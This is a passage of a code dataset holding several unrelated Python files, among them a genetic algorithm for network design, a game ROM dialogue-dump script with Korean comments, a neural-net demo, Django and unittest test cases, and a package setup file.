NetworkVisualizer\n\n\nclass GeneticAlgorithm:\n def __init__(self, network: NetworkModel, n: int, epochs: int, mutationFactor: int, singleMode: bool,\n xoverChance: float, selection: str, succession: str, modularity: int, xoverMode: str):\n self.network = network\n self.n = n\n self.epochs = epochs\n self.mutationFactor = mutationFactor\n self.singleMode = singleMode\n self.xoverChance = xoverChance\n self.xoverMode = xoverMode\n self.selection = selection\n self.succession = succession\n self.modularity = modularity\n\n # Used for tracing algorithm progress\n self.costHistory: List[float] = []\n self.changesHistory: List[int] = []\n self.lastSamePos = 0\n self.lastSameVal = 0.0\n\n # Create initial population\n self.population = [Chromosome(network, singleMode, k=modularity) for _ in range(self.n)]\n\n def run(self, quiet: bool) -> float:\n for i in range(self.epochs):\n if not quiet:\n print(f'[i] Running epoch {i}')\n\n # Select new population\n row: List[Chromosome] = sorted(self.population, key=lambda x: x.objFunc())\n self.costHistory.append(row[0].objFunc())\n\n # Best one continues unmodified\n bestChrom = copy.deepcopy(row[0])\n\n xoverMask = []\n xovers = 0\n for _ in range(self.n - 1):\n if random.uniform(0, 1) > self.xoverChance:\n xoverMask.append(0)\n else:\n xoverMask.append(1)\n xovers += 1\n onlyMutate = self.n - 1 - xovers\n\n samples = onlyMutate + xovers * 2\n if self.selection == 'rand':\n chosenOnes = random.choices(row, k=samples)\n elif self.selection == 'exp':\n weights = [math.exp(-x) for x in range(self.n)]\n chosenOnes = random.choices(row, weights, k=samples)\n else:\n raise ValueError('Selection must be one of the following: rand, exp')\n\n children: List[Chromosome] = []\n\n # Crossover\n idx = 0\n for bit in xoverMask:\n if bit == 0:\n children.append(chosenOnes[idx])\n idx += 1\n continue\n\n child = Chromosome.reproduce(chosenOnes[idx], chosenOnes[idx + 1], self.xoverMode)\n children.append(child)\n idx += 2\n\n # Mutation\n for child in children:\n child.mutate(self.mutationFactor)\n\n # Succession\n if self.succession == 'best':\n combined: list[Chromosome] = row[1:] + children\n combined = sorted(combined, key=lambda x: x.objFunc())\n\n self.population = [bestChrom] + combined[:self.n - 1]\n elif self.succession == 'tourney':\n self.population = [bestChrom]\n\n for idx in range(self.n - 1):\n if row[idx + 1].objFunc() <= children[idx].objFunc():\n self.population.append(row[idx + 1])\n else:\n self.population.append(children[idx])\n else:\n raise ValueError('Invalid succession mode, expected: best or tourney')\n\n assert (len(self.population) == self.n)\n\n # Check how we're doing\n same 
= self.lenOfSame(i, self.costHistory[-1])\n self.changesHistory.append(same)\n\n # Sort final population\n self.population = sorted(self.population, key=lambda x: x.objFunc())\n return self.population[0].objFunc()\n\n def lenOfSame(self, epoch: int, score: float) -> int:\n \"\"\"\n Returns number of epochs that resulted in the same score\n \"\"\"\n if self.lastSameVal != score:\n self.lastSameVal = score\n self.lastSamePos = epoch\n return epoch - self.lastSamePos\n\n def result(self, visualizer: NetworkVisualizer) -> None:\n \"\"\"\n Output a lot of useful information to .csv files\n Also, take care of drawing mathplotlib graphs\n :param visualizer: reference to NetworkVisualizer class\n :return: None\n \"\"\"\n visualizer.drawNetworkModel(self.network, self.population[0])\n visualizer.drawObjFuncGraph(self.costHistory)\n visualizer.drawChangesHistory(self.changesHistory)\n\n visualizer.outputCSV('cost_history.csv',\n ['Epoch', 'Value'],\n [[i, val] for i, val in enumerate(self.costHistory)]\n )\n\n bestResult = self.population[0]\n linksNames = [link for link in self.network.links]\n modules = bestResult.modulesPerLink()\n visualizer.outputCSV('modules_per_link.csv',\n ['Link name', 'Modules installed'],\n [[name, modules[name]] for name in linksNames]\n )\n\n demandsNames = [demand for demand in self.network.demands]\n visualizer.outputCSV('path_choices.csv',\n ['Demand name'] + [f'Path_{i}' for i in range(10)],\n [\n [name] +\n [str(ch) for ch in bestResult.genes[name].path_choices]\n for name in demandsNames\n ])\n\n perLinkDemand = bestResult.modulesPerLink()\n visualizer.outputCSV('modules_per_link_per_demand.csv',\n ['Demand name'] + [name for name in linksNames],\n [\n [name] +\n [str(perLinkDemand[linkName]) for linkName in linksNames]\n for name in demandsNames\n ])\n\n demandsDiff = bestResult.calcDemands()\n visualizer.outputCSV('demand_diff_per_link.csv',\n ['Link name', 'Demand diff'],\n [[name, demandsDiff[name]] for name in linksNames]\n )\n\n if self.singleMode:\n paths: Dict[str, List[str]] = {}\n for name in demandsNames:\n pathNo = bestResult.genes[name].path_choices.index(1)\n paths[name] = [link.name for link in self.network.getDemand(name).paths[pathNo]]\n\n visualizer.outputCSV('links_per_demand.csv',\n ['Demand name'] + [f'Link_{i}' for i in range(8)],\n [[name] + paths[name] for name in demandsNames]\n )\n else:\n visualizer.outputCSV('link_per_demand.csv',\n ['Demand name', '0'], [['Not applicable...', '0']])\n\n bestResult.saveToXML(os.path.join(visualizer.outputDir, 'solution.xml'))\n\n visualizer.outputCSV('summary.csv',\n ['Parameter', 'Value'],\n [\n ['Epochs count', self.epochs],\n ['Population size', self.n],\n ['Mutation factor', self.mutationFactor],\n ['Single mode', self.singleMode],\n ['Modularity factor', self.modularity],\n ['Network size (nodes)', len(self.network.nodes)],\n ['Network size (links)', len(self.network.links)],\n ['Network size (demands)', len(self.network.demands)],\n ['Best score', bestResult.objFunc()],\n ['Total modules used', sum(bestResult.modulesPerLink().values())]\n ]\n )\n","sub_path":"src/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"532297877","text":"# -*- coding:utf-8 -*-\n\"\"\"\n-------------------룬팩 2,3,4 데이터 구조\n맨 처음에 헤더가 남습니다. 
리틀엔디안 방식으로 4바이트로 끊어서\n[매직스탬프 TEXT] [총 대사 갯수] [대사길이] [대사 시작오프셋]\n[대사길이] [대사 시작오프셋][대사길이] [대사 시작오프셋]\n[대사길이] [대사 시작오프셋][대사길이] [대사 시작오프셋]\n[대사길이] [대사 시작오프셋][대사길이] [대사 시작오프셋]\n...\n반복입니다.\n\n-------------------프로그램 구조\n맨 처음 포인터를 찾고(foundoffset) 대사를 찾은후 포인터를 찾고(nextoffset) 이를 txt에 기록합니다.\n유니코드일경우 TBL을 탐색하여 그 TBL에 해당하는 글자가 있으면 그 TBL로 추출하고 없을경우 오류메세지를 띄우는 기능입니다\n\n-------------------상대 오프셋 디버깅에 관하여(DEBUG_RELATIVE_OFFSET)\n룬팩 파일 내에는 대사의 길이가 내장되있습니다. 디버깅 모드를 켜면 그것을 이용해 WQSG 스크립트의 대사를 측정하며\n끌 경우에는 이 프로그램 내에서 일일히 하나하나 셉니다\n자세한 것은 아래 주석을 참고하세요.\n★★★★★ 현재는 사용 불가능합니다 사용할 필요성을 못느꼈습니다.\n\n\n-------------------상대 어드레스 디버깅에 관하여(DEBUG_RELATIVE_ADDRESS)\n룬팩 파일 내에는 대사의 길이가 내장되있습니다. 디버깅 모드를 켜면 그것을 이용해 WQSG 스크립트의 대사를 측정하며\n끌 경우에는 이 프로그램 내에서 일일히 하나하나 셉니다\n자세한 것은 아래 주석을 참고하세요.\n★★★★ 어드레스 디버깅을 사용하면 강제로 오프셋 디버깅 또한 사용하게 됩니다.\n\ninFp3 = 포인터 쪽을 읽어드리는 부분입니다.\ninFp2 = 총 대사를 읽어드리는 부분입니다\n\"\"\"\n\"\"\"\n주의!!!\n추출했을때 \\n 은 줄띄는 \"새줄 문자\"라는 것으로 제어코드로 \"0A\" 입니다\n삽입시 이를 replace 해야될겁니다.\n\"\"\"\nglobal readfile\nglobal writefile\nglobal tablefile\nglobal inFp3\n\nimport time\nimport sys\n\n\ndef foundoffset(inFp):\n inFp = open(readfile, \"rb\")\n inFp.read(0xC)\n result=little_end_to_big_end(inFp)\n inFp.close()\n return int(result,16)\ndef little_end_to_big_end(inFpset):\n blank=[]\n for i in range(1,5):\n startpath=inFpset.read(1)\n temp=hex(ord(startpath))\n if(temp==\"0x0\"):\n temp=\"0x00\"\n if(temp==\"0x1\"):\n temp=\"0x01\"\n if(temp==\"0x2\"):\n temp=\"0x02\"\n if(temp==\"0x3\"):\n temp=\"0x03\"\n if(temp==\"0x4\"):\n temp=\"0x04\"\n if(temp==\"0x5\"):\n temp=\"0x05\"\n if(temp==\"0x6\"):\n temp=\"0x06\"\n if(temp==\"0x7\"):\n temp=\"0x07\"\n if(temp==\"0x8\"):\n temp=\"0x08\"\n if(temp==\"0x9\"):\n temp=\"0x09\"\n if(temp==\"0xa\"):\n temp=\"0x0A\"\n if(temp==\"0xb\"):\n temp=\"0x0B\"\n if(temp==\"0xc\"):\n temp=\"0x0C\"\n if(temp==\"0xd\"):\n temp=\"0x0D\"\n if(temp==\"0xe\"):\n temp=\"0x0E\"\n if(temp==\"0xf\"):\n temp=\"0x0F\"\n blank.append(temp) #각각 읽어 blank에 추가\n\n blank.reverse() #리틀엔디안->빅엔디안\n pointer=\"\"\n pointer += blank[0]\n pointer += blank[1]\n pointer += blank[2]\n pointer += blank[3]\n pointer=pointer.replace(\"0x\",\"\")\n result=\"\"\n result+=pointer\n result=result.upper()\n return result\ndef nextoffset(nextoffset):\n inFp3.read(nextoffset)\n result = little_end_to_big_end(inFp3)\n return result\ndef tableread():\n global TBLword\n global TBLhex\n inFp4=open(tablefile,\"r\",encoding='utf-8')\n while True:\n line=inFp4.readline()\n line=line.replace(\"\\n\",\"\")\n line=line.split(\"=\")\n if (line == ['']):\n break\n line[0] = line[0].replace(u\"\\ufeff\", '') #BOM고유오류 조정\n TBLword.append(line[1])\n TBLhex.append(line[0])\n print(TBLword)\n print(TBLhex)\n return\n\nreadfile=sys.argv[1]\ntry:\n writefile = sys.argv[2]\nexcept IndexError:\n writefile=readfile\n writefile+=\".txt\"\ntablefile=\"수정UTF_일어_대사추출.tbl\"\n#tablefile=sys.argv[3]\ninFp=0\ntexts=[]\n\n\nDEBUG_RELATIVE_OFFSET=1 #---------------------디버그 이용\nDEBUG_RELATIVE_ADDRESS=1 #---------------------디버그 이용\n\n\"\"\"\n상대 어드레스 디버그 이용\n0 -> 직접 주소값을 세 WQSG의 어드레스에 입력합니다\n1 -> 롬파일에 기록된 어드레스를 읽어내 WQSG의 길이에 입력합니다\n\n\n사용처\n대사를 삽입했을때 길이와 글자수가 일치하는지 검사하기위해 사용할 예정입니다.\n\"\"\"\n\n\"\"\"\n상대 오프셋 디버그 이용\n0 -> 직접 글자수를 세 WQSG의 길이에 입력합니다\n1 -> 롬파일에 기록된 글자수를 세 WQSG의 길이에 입력합니다\n\n\n사용처\n대사를 삽입했을때 길이와 글자수가 일치하는지 검사하기위해 사용할 예정입니다.\n\"\"\"\nif (DEBUG_RELATIVE_OFFSET == 0): # ------------------디버그가 1일 경우 shortoffset 대신 롬파일에서 읽어옵니다!\n print(\"YOU ARE IN DEBUG_RELATIVE_OFFSET MODE! 
READ LENGTH FROM ROM\")\n time.sleep(1)\nif (DEBUG_RELATIVE_ADDRESS == 1): # ------------------디버그가 1일 경우 shortoffset 대신 롬파일에서 읽어옵니다!\n print(\"YOU ARE IN DEBUG_RELATIVE_ADRESS MODE! READ LENGTH AND ADREES FROM ROM\")\n time.sleep(1)\n#------------------init-----------------------------\nlongoffset=0 #시작부터 끝까지 0으로 초기화가 안됨 - 시작되는 어드레스를 뜻합니다\nshortoffset=0 #한번 찾으면 바로 초기화 - 총 길이를 뜻합니다\nlengthoffset=0\nTBLword = [] #테이블 파일중 단어\nTBLhex = [] #테이블 파일중 16진수값\n#---------------------------------------------------\n\n\nstartoffset=foundoffset(inFp) #오프셋찾기(0x0c)\ntableread() #테이블파일읽기\ninFp=open(readfile,\"rb\")\noutFp=open(writefile,\"w\",encoding='utf-8')\ninFp3 = open(readfile, \"rb\")\n\ninFp3.read(0xC)\n\n\ns = inFp.read(startoffset)\nif (DEBUG_RELATIVE_OFFSET == 1) or (DEBUG_RELATIVE_ADDRESS==1):\n inFp3.close()\n inFp3 = open(readfile, \"rb\")\n inFp3.read(0x8)\n\nlenscrpit=0\n\nif (DEBUG_RELATIVE_ADDRESS == 1): # 롬 안의 메모리를 읽어오는경우\n inFp3.close()\n inFp3 = open(readfile, \"rb\")\n inFp3.read(0x4)\n looptime = int(little_end_to_big_end(inFp3), 16) # 총 대사길이를 알아냅니다\n inFp.close()\n beforeaddress = 0\n for kig in range(0, looptime):\n inFp = open(readfile, \"rb\")\n length = int(little_end_to_big_end(inFp3), 16) # 롬의 길이를 읽어냅니다\n address = int(little_end_to_big_end(inFp3), 16) # 롬의 주소값을 알아냅니다\n inFp.read(address) # 열었다 닫았따 하기때문에 바로 주소에서 읽어내도 상관이 없습니다\n result = inFp.read(length)\n result = str(result)\n result = result[2:-1]\n foundregester = 0\n lenresult = result\n result = result.replace(\"\\\\'\", \"'\")\n for i in range(0, len(lenresult)): # 대사에서 TBL에 있는 것들을 검색해야합니다.\n # i +=(foundregester)\n try:\n\n if ((result[i]) == ('\\\\') and not result[i:i + 2] == ('\\\\n') and not result[i:i + 2] == (\n \"\\\\\\\\\")): # 검색한것이 줄띄어쓰기가 아니고 ASCII코드에 없는경우\n if not (result[i:i + 4] == str('\\\\x00')) and not (result[i:i + 4] == \"\\\\xc\") and not (\n result[i:i + 4] == str(b'\\xa0')): # 특수한 경우를 제외합니다\n\n # ------------------3바이트, 2바이트, 1바이트 차례를 읽어와 테이블과 대조해야합니다!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n check = 0\n\n for t in range(0, 3):\n tblresult = \"\" # tbl 찾는값\n tblresult = result[i:i + (12 - 4 * t)] # 3바이트 2바이트 1바이트 차례로 읽어옴 읽어오기\n tblresult = tblresult.replace(\"'\", \"\")\n tblresult = tblresult.replace(\"x\", \"\")\n # print(\"tblresult\")\n # print(tblresult)\n # if(tblresult in \"\\\\\\\\\"): #만~~~약에 찾으려 했던 값이 \\였으면\n # print(\"HIHIHIHIHI\")\n # tblresult.replace('\\\\\\\\','\\\\')\n # foundregister+=1\n # check=1\n # time.sleep(10)\n # break\n #\n tblresult = tblresult.replace(\"\\\\\", \"\")\n tblresult = tblresult.upper() # 테��블 파일을 읽기위해 3바이트 HEX로 치환\n\n for k in range(0, len(TBLhex)): # 3바이트 HEX가 테이블파일에 있는지 검사\n if (tblresult == str(TBLhex[k])):\n tblresult = str(TBLword[k])\n # foundregester += int(len(TBLhex)/2) #찾은만큼 오프셋이 옆으로 이동해야하므로 추가합니다\n check = 1\n break\n if (check == 1):\n break\n\n if (check == 0):\n talk = \"TBL FILE CANNOT FOUND HEX CODES IN SCRPIT! 
HEX CODE ->\"\n talk += tblresult\n print(talk)\n print(\"10초 후 계속됩니다.\")\n time.sleep(10)\n\n temp0 = result[0:i] # 문자열을 두 부분으로 나눈다음 가운데를 방금 찾은 테이블표 값을 입력한후 다시 합칩니다.\n temp1 = result[i + 12 - 4 * t:len(result)]\n result = \"\"\n result += temp0\n result += tblresult\n result += temp1\n\n # print(result)\n else:\n length += 1\n\n except:\n break\n print(result)\n address = str(hex(address))\n address = address.replace(\"x\", \"\")\n address = address.upper()\n if (len(address) == 1):\n address = \"0000000\" + address\n if (len(address) == 2):\n address = \"000000\" + address\n if (len(address) == 3):\n address = \"00000\" + address\n if (len(address) == 4):\n address = \"0000\" + address\n if (len(address) == 5):\n address = \"000\" + address\n if (len(address) == 6):\n address = \"00\" + address\n if (len(address) == 7):\n address = \"0\" + address\n if ('\\\\\\\\') in result:\n result = result.replace(\"\\\\\\\\\", \"\\\\\") # \\\\이 써진걸 \\로 바꿉니다\n # outFp.write(str(address)) # 시작오프셋\n # outFp.write(\",\")\n # outFp.write(str(length)) # 길이\n # outFp.write(\",\")\n outFp.write(str(result))\n outFp.write(\"\\n\")\n length += 1\n inFp.close()\n lenscrpit += 1\nif(DEBUG_RELATIVE_ADDRESS==0):\n while True:\n s = inFp.read(1) #한칸한칸 읽어 대사의 마지막까지 검사합니다.\n if (len(s)==0):\n break\n if s == '':\n break\n if(ord(s)==00): #마지막일경우\n result=\"\"\n if(lenscrpit==0):\n if(DEBUG_RELATIVE_OFFSET==0):\n resultoffset = nextoffset(0)\n else: # ------------------디버그가 1일 경우 shortoffset 대신 롬파일에서 읽어옵니다!------------shortoffset 올라가는건 맨 아래에 있습니다.\n lengthoffset = int(little_end_to_big_end(inFp3),16) # 길이 = 롬에서 읽어옴\n resultoffset=nextoffset(0) #디버그가 1일경우 nextoffset을 4칸 건너뛴 곳에서 하지않고, 바로 읽어야합니다.\n else:\n if(DEBUG_RELATIVE_OFFSET==0):\n resultoffset=nextoffset(4)\n else: # ------------------디버그가 1일 경우 shortoffset 대신 롬파일에서 읽어옵니다!\n lengthoffset = int(little_end_to_big_end(inFp3),16) # 길이 = 롬에서 읽어옴\n resultoffset=nextoffset(0) #디버그가 1일경우 nextoffset을 4칸 건너뛴 곳에서 하지않고, 바로 읽어야합니다.\n\n lenscrpit += 1\n inFp2 = open(readfile, \"rb\")\n a=inFp2.read(startoffset) #처음 커서까지 이동\n if (longoffset != 0):\n a = inFp2.read(longoffset) # 방금까지의 오프셋으로 이동\n length=0\n tempoffset = shortoffset\n while True: # 총 대사길이 읽기\n if(length==tempoffset):\n break\n a = inFp2.read(1)\n a = str(a)\n\n if(len(a)==7) and not(a==str(b'\\x00')) and not(a==\"b'\\\\xc'\") and not(a==str(b'\\xa0')): #ASCII 코드에 없는경우\n tblresult=\"\" #tbl 찾는값\n tempoffset-=2 #2개를 더읽어오므로 미리추가\n b = inFp2.read(2)\n b = str(b)\n tblresult+=a[3:]\n tblresult+=b[3:]\n tblresult = tblresult.replace(\"'\", \"\")\n tblresult = tblresult.replace(\"x\", \"\")\n tblresult = tblresult.replace(\"\\\\\", \"\")\n tblresult=tblresult.upper() #테이블 파일을 읽기위해 3바이트 HEX로 치환\n check=0\n\n for i in range(0,len(TBLhex)): #3바이트 HEX가 테이블파일에 있는지 검사\n if(tblresult == str(TBLhex[i])):\n tblresult = str(TBLword[i])\n check=1\n break\n if(check==0):\n talk=\"TBL FILE CANNOT FOUND HEX CODES IN SCRPIT!\"\n talk+=tblresult\n\n print(talk)\n break\n result+=tblresult\n else:\n result+=a[2:-1]\n length += 1\n longoffset+=shortoffset+1 #방금까지 오프셋 추가\n a=str(a)\n if(DEBUG_RELATIVE_OFFSET == 1):\n shortoffset = lengthoffset\n print(result)\n outFp.write(resultoffset) #시작오프셋\n outFp.write(\",\")\n outFp.write(str(shortoffset)) #길이\n outFp.write(\",\")\n outFp.write(str(result))\n outFp.write(\"\\n\")\n a=inFp.read(1)\n shortoffset = 0 # 대사길이 초기화\n shortoffset+=1 #대사길이 추가\nprint(\"Done!\")\ninFp.close()\noutFp.close()\ninFp3.close()\n\n","sub_path":"Deprecated/RF WQSG Text Dump with TBL.py","file_name":"RF WQSG Text Dump 
with TBL.py","file_ext":"py","file_size_in_byte":15346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"496280723","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom HyperParameters import HyperParameters\nfrom DataReader import DataReader\nfrom NeuralNet import NeuralNet\n\nfile_name = \"./ch05.npz\"\n\ndef ShowResult(net,reader):\n X,Y = reader.GetWholeTrainSamples()\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.scatter(X[:,0],X[:,1],Y)\n\n p = np.linspace(0,1)\n q = np.linspace(0,1)\n P,Q = np.meshgrid(p,q)\n R = np.hstack((P.ravel().reshape(2500,1),Q.ravel().reshape(2500,1)))\n Z = net.inference(R)\n Z = Z.reshape(50,50)\n ax.plot_surface(P,Q,Z,cmap='rainbow')\n plt.show()\n\nif __name__ == \"__main__\":\n reader = DataReader(file_name)\n reader.ReadData()\n reader.NormalizeX()\n reader.NormalizeY()\n\n hp = HyperParameters(2,1,eta=0.01,max_epoch=50,batch_size=10,eps = 1e-5)\n net = NeuralNet(hp)\n net.train(reader,checkpoint=0.1)\n print(\"W=\",net.weight)\n print(\"B=\",net.bias)\n\n x1 = 15\n x2 = 93\n x = np.array([x1,x2]).reshape(1,2)\n x_new = reader.NormalizePredicateData(x)\n z = net.inference(x_new)\n print(\"Z=\",z)\n Z_true = z*reader.Y_norm[0,1] + reader.Y_norm[0,0]\n print(\"Z_true=\",Z_true)\n ShowResult(net,reader)","sub_path":"NetCode/NeuralNet1.0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"408321196","text":"# -*- coding: utf-8 -*-\nimport logging\nimport os\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import Group, User\nfrom django.contrib.gis.geos import GEOSGeometry, Polygon\nfrom django.test import TestCase\nfrom django.db import DatabaseError\nfrom mock import patch, Mock, call, MagicMock\n\nfrom eventkit_cloud.jobs.models import Job, Region, ProviderTask, ExportProvider\n\nfrom celery.result import AsyncResult\nimport uuid\nfrom ..task_factory import TaskFactory, create_run\nfrom ..models import ExportRun\n\nlogger = logging.getLogger(__name__)\n\n\nclass TestExportTaskFactory(TestCase):\n \"\"\"\n Test cases for the TaskFactory.\n \"\"\"\n\n fixtures = ('insert_provider_types.json', 'osm_provider.json',)\n\n def setUp(self, ):\n self.path = os.path.dirname(os.path.realpath(__file__))\n Group.objects.create(name='TestDefaultExportExtentGroup')\n self.user = User.objects.create(username='demo', email='demo@demo.com', password='demo')\n bbox = Polygon.from_bbox((-10.85, 6.25, -10.62, 6.40))\n the_geom = GEOSGeometry(bbox, srid=4326)\n self.job = Job.objects.create(name='TestJob', description='Test description', user=self.user,\n the_geom=the_geom)\n provider = ExportProvider.objects.get(slug='osm')\n provider_task = ProviderTask.objects.create(provider=provider)\n self.job.provider_tasks.add(provider_task)\n self.region = Region.objects.get(name='Africa')\n self.job.region = self.region\n self.uid = str(provider_task.uid)\n self.job.save()\n\n def test_create_run_success(self):\n run_uid = create_run(job_uid=self.job.uid)\n self.assertIsNotNone(run_uid)\n self.assertIsNotNone(ExportRun.objects.get(uid=run_uid))\n\n @patch('eventkit_cloud.tasks.task_factory.ExportRun')\n def test_create_run_failure(self, ExportRun):\n ExportRun.objects.create.side_effect = DatabaseError('FAIL')\n with self.assertRaises(DatabaseError):\n run_uid = create_run(job_uid=self.job.uid)\n self.assertIsNone(run_uid)\n\n 
@patch('eventkit_cloud.tasks.task_factory.finalize_export_provider_task')\n @patch('eventkit_cloud.tasks.task_factory.create_task')\n @patch('eventkit_cloud.tasks.task_factory.chain')\n def test_task_factory(self, task_factory_chain, create_task, finalize_task):\n run_uid = create_run(job_uid=self.job.uid)\n self.assertIsNotNone(run_uid)\n self.assertIsNotNone(ExportRun.objects.get(uid=run_uid))\n worker = \"some_worker\"\n provider_uuid = uuid.uuid4()\n task_runner = MagicMock()\n task = Mock()\n task_runner().run_task.return_value = (provider_uuid, task)\n create_task.return_value = task\n task_factory = TaskFactory()\n task_factory.type_task_map = {'osm-generic': task_runner, 'osm': task_runner}\n task_factory.parse_tasks(run_uid=run_uid, worker=worker)\n task_factory_chain.assert_called()\n create_task.assert_called()\n finalize_task.s.assert_called()\n","sub_path":"eventkit_cloud/tasks/tests/test_task_factory.py","file_name":"test_task_factory.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"462972909","text":"#---------------------------------------------------------------------------\n#importing the packages containing necessary functions and initializers\nfrom GameOfLife import *\nfrom GameParameters import *\n\n#declaring two empty lists for further use\nthisGen = []\nnextGen = []\n\n#calling the initGrid function to initialise the thisGen list\ninitGrid(ROWS, COLS, thisGen)\n\n#using deepcopy function to create a copy of thisGen list into nextGen for performing changes without affecting the original list i.e. thisGen\nnextGen = copy.deepcopy(thisGen)\n\n#calling the printGen function to print the board for the actions\nprintGen(ROWS, COLS, thisGen, 0)\n\n#looping through generations \nfor gens in range(1, GENERATIONS+1):\n input(\"Press ENTER to see next generation\")\n #calling processNextGen function for processing the next generation \n processNextGen(ROWS, COLS, thisGen, nextGen)\n printGen(ROWS, COLS, nextGen, gens)\n thisGen = copy.deepcopy(nextGen)\ninput(\"Finished. 
Press ENTER to quit.\")\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"305479578","text":"from distutils.core import setup\nimport setuptools\n\nshort_description = \"Create, visualise and leverage networks of ANPR cameras on the road network.\"\n\nlong_description = \\\n\"\"\"\n**ANPRx** is a package for traffic analytics using networks of automatic number plate cameras.\n\"\"\"\n\nclassifiers = ['Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: GIS',\n 'Topic :: Scientific/Engineering :: Visualization',\n 'Topic :: Scientific/Engineering :: Physics',\n 'Topic :: Scientific/Engineering :: Mathematics',\n 'Topic :: Scientific/Engineering :: Information Analysis',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6']\n\nwith open('requirements.txt') as f:\n requirements_lines = f.readlines()\ninstall_requires = [r.strip() for r in requirements_lines]\n\n# now call setup\nsetup(name = 'anprx',\n version = '0.1.1',\n description = short_description,\n long_description = long_description,\n classifiers = classifiers,\n url = 'https://github.com/pedroswits/anprx',\n author = 'Pedro Pinto da Silva',\n author_email = 'ppintodasilva@gmail.com',\n license = 'Apache License 2.0',\n platforms = 'any',\n packages = ['anprx'],\n install_requires = install_requires,\n extras_require = {\n 'tests': [\n 'tox >= 3.2.1',\n 'pytest >= 3.8.2'],\n 'docs': [\n 'sphinx >= 1.4',\n 'sphinx_rtd_theme'],\n 'examples': [\n 'ipykernel']})\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"268443301","text":"\"\"\" Test fit functions\n\"\"\"\n\nimport dismod_mr\n\ndef test_fit_asr():\n dm = dismod_mr.data.ModelData()\n dm.vars = dismod_mr.model.process.age_specific_rate(dm, 'p')\n \n dismod_mr.fit.asr(dm, 'p', iter=10, burn=5, thin=1)\n\ndef test_fit_consistent():\n dm = dismod_mr.data.ModelData()\n dm.vars = dismod_mr.model.process.consistent(dm)\n \n dismod_mr.fit.consistent(dm, iter=10, burn=5, thin=1)\n\nif __name__ == '__main__':\n import nose\n nose.runmodule()\n \n","sub_path":"tests/test_fit.py","file_name":"test_fit.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"438316172","text":"\nimport codecs\nimport project9_util as util\n\ndef fd():\n\n fdhis = \"fudan_history.txt\"\n enc = util.detect_encoding(fdhis)\n with codecs.open(fdhis,encoding=enc) as file:\n lines = file.readlines()\n\n newfile = util.nl_filename(fdhis)\n\n row_count = 1\n with codecs.open(newfile,\"w\",encoding=enc) as newfile2:\n for line in lines:\n if not line.split():\n newfile2.write(' '*5+line)\n continue\n newfile2.write(\"%-5d\"%row_count+line)\n row_count += 1\n\nif __name__ == '__main__':\n fd()\n\n \n","sub_path":"project9/project/16300120183.py","file_name":"16300120183.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"253615466","text":"from pprint import pprint\nimport unittest\n\nimport requests\n\nfrom application.views.vote import get_filtered_votes\nfrom 
application.views.vote import get_vote\nfrom application.views.vote import get_votes_by_person\nfrom application.views.vote import get_voting_record\n\n\nclass TestGetVote(unittest.TestCase):\n\t'''Test for the vote.get_vote() utility.'''\n\n\tdef test_get_vote(self):\n\t\t'''Test for vote.get_vote()'''\n\t\tvote = get_vote('118530')\n\t\tself.assertEqual(len(vote), 26)\n\t\tself.assertEqual(len(vote['related_bill']), 29)\n\t\texpected_title = ('H.R. 2578: Commerce, Justice, Science, and Related '\n\t\t\t'Agencies Appropriations Act, 2016')\n\t\tself.assertEqual(vote['related_bill']['title'], expected_title)\n\n\nclass TestGetFilteredVotes(unittest.TestCase):\n\n\tdef test_get_filtered_votes_all_votes(self):\n\t\tresponse = get_filtered_votes()\n\t\tvotes = response['objects']\n\t\tself.assertEqual(len(response), 2)\n\t\tself.assertEqual(len(votes), 100)\n\t\tself.assertTrue(104434 <= response['meta']['total_count'])\n\n\tdef test_get_filtered_votes_by_vote_id(self):\n\t\tvote_id = 118531\n\t\t# returns a single 'vote' object (no 'meta' of 'objects')\n\t\tvote = get_filtered_votes(vote_id=vote_id)\n\t\tself.assertEqual(len(vote), 26)\n\t\tself.assertEqual(vote['id'], vote_id)\n\t\tself.assertEqual(vote['congress'], 114)\n\n\tdef test_get_filtered_votes_by_bill_id(self):\n\t\tbill_id = 341624\n\t\tresponse = get_filtered_votes(bill_id=bill_id)\n\t\tvotes = response['objects']\n\t\tself.assertEqual(len(response), 2)\n\t\tself.assertTrue(21 <= response['meta']['total_count'])\n\t\tfor v in votes:\n\t\t\tself.assertEqual(v['related_bill']['id'], bill_id)\n\n\tdef test_get_filtered_votes_failure(self):\n\t\t'''Test that an exception is raised if too many args are passed.'''\n\t\tvote_id = 118531\n\t\tbill_id = 341624\n\t\traises = False\n\t\ttry:\n\t\t\tresponse = get_filtered_votes(vote_id=vote_id, bill_id=bill_id)\n\t\texcept:\n\t\t\traises = True\n\t\tself.assertEqual(raises, True)\n\n\nclass TestGetVotesByPerson(unittest.TestCase):\n\t'''Test the vote.get_votes_by_person() utility.'''\n\n\tdef test_get_votes_by_person(self):\n\t\t'''Test getting all votes by Bernie Sanders.'''\n\t\tn = 2\n\t\toffset = 